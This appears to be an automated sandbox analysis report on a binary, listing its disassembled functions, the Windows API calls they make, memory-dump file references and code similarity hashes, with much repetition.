                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                • Opcode ID: c33cbb0405661ff5f45be6a5c1a504d5eeb306fd0f72642482b90d7bf11f84e7
                                                                                                                                                                • Instruction ID: 4169cab05aef8539026be34e6b60a63ba630c27f9be038379ec96af5b44c69de
                                                                                                                                                                • Opcode Fuzzy Hash: c33cbb0405661ff5f45be6a5c1a504d5eeb306fd0f72642482b90d7bf11f84e7
                                                                                                                                                                • Instruction Fuzzy Hash: 3341C6B4D10B40AFD370EF39994B713BEB8AB05250F504B1EF9E6866D4E231A4198BD7
                                                                                                                                                                Function 009ED7BD Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 009EDD03
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ComputerName
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3545744682-0
                                                                                                                                                                • Opcode ID: 3d201e59fe1b3be424e6a051b6b87c6a48c84d7e1004d717bc6d3b8be6947bae
                                                                                                                                                                • Instruction ID: e344d5ff5c033e102957098ceb323fdc2af7e046344ebc7a1c56ce16edbc4c92
                                                                                                                                                                • Opcode Fuzzy Hash: 3d201e59fe1b3be424e6a051b6b87c6a48c84d7e1004d717bc6d3b8be6947bae
                                                                                                                                                                • Instruction Fuzzy Hash: C621C1B01057D18BD7268F39C4A0732BBE1BF5B344F2896CDD4D38B682CA78A846C761
                                                                                                                                                                Function 009EDC76 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 009EDD03
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ComputerName
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3545744682-0
                                                                                                                                                                • Opcode ID: 0cf80f791a98703465eb4eaf04828f227b5c53e05257afdf0c3f02e259f1faa8
                                                                                                                                                                • Instruction ID: a3a57fe5ad78b5ddd4f9a134028059ad76c34c7a3612feb46798b6930f0205a4
                                                                                                                                                                • Opcode Fuzzy Hash: 0cf80f791a98703465eb4eaf04828f227b5c53e05257afdf0c3f02e259f1faa8
                                                                                                                                                                • Instruction Fuzzy Hash: F711C4B06047918BD7258B25C860722BBE2BF4A304B2CD69DD4D3CB382CA38D846C761
                                                                                                                                                                Function 009FE0A0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000), ref: 009FE0E0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 4931c202b1b4cc174eb536050c2e5457b38aeb57f3b6da260696f3fddb8d6818
                                                                                                                                                                • Instruction ID: 718621c27f7d0ec50cf14ed09df3a62ec96bc8de8675b7250b2cfd1928778e73
                                                                                                                                                                • Opcode Fuzzy Hash: 4931c202b1b4cc174eb536050c2e5457b38aeb57f3b6da260696f3fddb8d6818
                                                                                                                                                                • Instruction Fuzzy Hash: 66F0A072828259FBD2106F38BD05B673AA4EFC2720F058834F50496261DE74E81B8791
                                                                                                                                                                Function 009CEC77 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 009CECA3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeSecurity
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 640775948-0
                                                                                                                                                                • Opcode ID: 35dc472c44846d70fc586fd3516ee47ebd4be3d923935df5dae09a87a23f7a06
                                                                                                                                                                • Instruction ID: 182e5481bd89d21c0415313f220e3eae6ad4a52a9a8908ba626401b60b34090c
                                                                                                                                                                • Opcode Fuzzy Hash: 35dc472c44846d70fc586fd3516ee47ebd4be3d923935df5dae09a87a23f7a06
                                                                                                                                                                • Instruction Fuzzy Hash: 7EE06C347EA346BAF63992249CA7F2632069B42F28E305B14B3213D6D4DAD03102864D
                                                                                                                                                                Function 009F0B2B Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
